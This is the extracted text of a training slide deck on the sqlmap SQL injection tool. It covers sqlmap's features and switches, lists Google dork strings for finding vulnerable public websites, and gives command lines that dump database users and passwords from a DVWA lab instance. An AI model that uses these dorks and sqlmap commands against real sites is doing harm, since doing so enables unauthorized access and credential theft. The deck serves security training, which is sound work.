Downloaded 229 times
Uploaded byInstitute of Information Security (IIS)
Sqlmap
sqlmap is an open-source penetration testing tool designed for automating the detection and exploitation of SQL injection vulnerabilities in databases. Developed in Python, it supports various database management systems and offers multiple SQL injection techniques, as well as features for user enumeration, password cracking, and privilege escalation. The tool aids in database exploration and information retrieval while allowing direct connections and executing custom SQL queries.
Sqlmap
- 1.
- 2. sqlmap • It isa open source tool to use sql injection in better and simpler way. • sqlmap Developed in python • sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. • It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
- 3. Sqlmap developed by BernardoDamele A. G. (@inquisb) Miroslav Stampar (@stamparm) https://twitter.com/inquisb https://twitter.com/stamparm
- 4. Features of sqlmap •Itsupport various type of database like •MySQL •Oracle •PostgreSQL •Microsoft SQL Server •Microsoft Access • IBM DB2 • SQLite • Firebird •Sybase •SAP MaxDB •HSQLDB • Informix database management systems.
- 5. Features of sqlmap •SQLinjection techniques: 1.boolean-based blind Based on page changes, data is inferred, char by char 2.time-based blind Based on time, data is inferred,char by char 3.error-based Uses the errors that are displayed to extract data 4.UNION query Changes the SQL queries to extract data 5.stacked queries Semi-colon are used to inject multiple statements on the SQL query 6.out-of-band the injection is made to a web application and a secondary channel such as DNS queries is used to dump the data back to the attacker domain. •Enumerate users, password hashes, privileges, roles, databases, tables and columns. • cracking password using a dictionary-based attack.
- 6. Features of sqlmap •Supportfor database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command. •Support to dump database tables entirely. •Support to dump database tables entirely. •Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. •Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name
- 7. Detection These optionscan be used to customize the detection phase --level=LEVEL Level of tests to perform (1-5, default 1) --risk=RISK Risk of tests to perform (1-3, default 1) --string=STRING String to match when query is evaluated to True --not-string=NOT.. String to match when query is evaluated to False --regexp=REGEXP Regexp to match when query is evaluated to True --code=CODE HTTP code to match when query is evaluated to True --text-only Compare pages based only on the textual content --titles Compare pages based only on their titles
- 8. Extracting Information WithSqlmap RECOVER SESSION USER USING SQLMAP. --current-user DETECT CURRENT DATABASE USING SQLMAP. --current-db FIND OUT IF SESSION USER IS DATABASE ADMINISTRATOR USING SQLMAP. --is-dba LIST DATABASE SYSTEM USERS USING SQLMAP. --users LIST DATABASES USING SQLMAP. --dbs DBMS SERVER HOSTNAME. --hostname DBMS EXACT VERSION, OS INFORMATION, ARCHITECTURE AND PATCH LEVEL. -f
- 9. Extracting Information WithSqlmap LIST THE DBMS USERS. --users LIST ALL DBMS USERS, PASSWORD HASHES --passwords LIST USERS PRIVILEGES. --privileges LIST ALL COLUMNS or JUST FOR A SPECIFIC TABLE FROM DATABASE --columns (-T <table name> -D <database>) EXECUTING A CUSTOM SQL QUERY. --sql-query=“<sql query to execute>” SQL SHELL TO EXECUTE ALL YOUR CUSTOM SQL QUERIES --sql-shell
- 10. Extracting Information WithSqlmap DBMS database to enumerate -D (Database_name) DBMS database table(s) to enumerate -T (table_name) DBMS database table column(s) to enumerate -C (columns_name) Dump DBMS database table entries --dump Dump all DBMS databases tables entries --dump-all Enumerate DBMS database tables --tables Enumerate DBMS users roles --roles
- 11. Extracting Information WithSqlmap Retrieve DBMS banner -b, --banner Enumerate DBMS schema --schema Retrieve DBMS comments --comments
- 12. Sqlmap : workflow •Finda vulnerable website • Google Dorks strings to find Vulnerable SQLMAP SQL injectable website •inurl:product-item.php?id= •inurl:news.php?catid= •inurl:index.php?id= •inurl:title.php?id= •Identify possible injections points •Identify SQLI vulnerabilities: •By using sqlmap •Manual testing •Exploit SQLi vulnerabilities
- 13.
- 14. Sqlmap –u http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#-cookie= ”PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low” --dbs DBMS databases using SQLMAP SQL Injection
- 15. DBMS databases usingSQLMAP SQL Injection
- 16. List tables oftarget database using SQLMAP SQL Injection Sqlmap –u http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit# -cookie= ”PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low” –D dvwa --tables
- 17. List columns ontarget table of selected database using SQLMAP SQL Injection Sqlmap –u http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit# -cookie= ”PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low” –D dvwa -T users --columns
- 18. List user andpassword from target columns of target table of selected database using SQLMAP SQL Injection Sqlmap –u http://172.25.25.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit# -cookie= ”PHPSESSID=lu4bqq7h7bali86bs6hadfscd6; security=low” –D dvwa -T users –C user,user_id,password --dump
- 19.
- 20.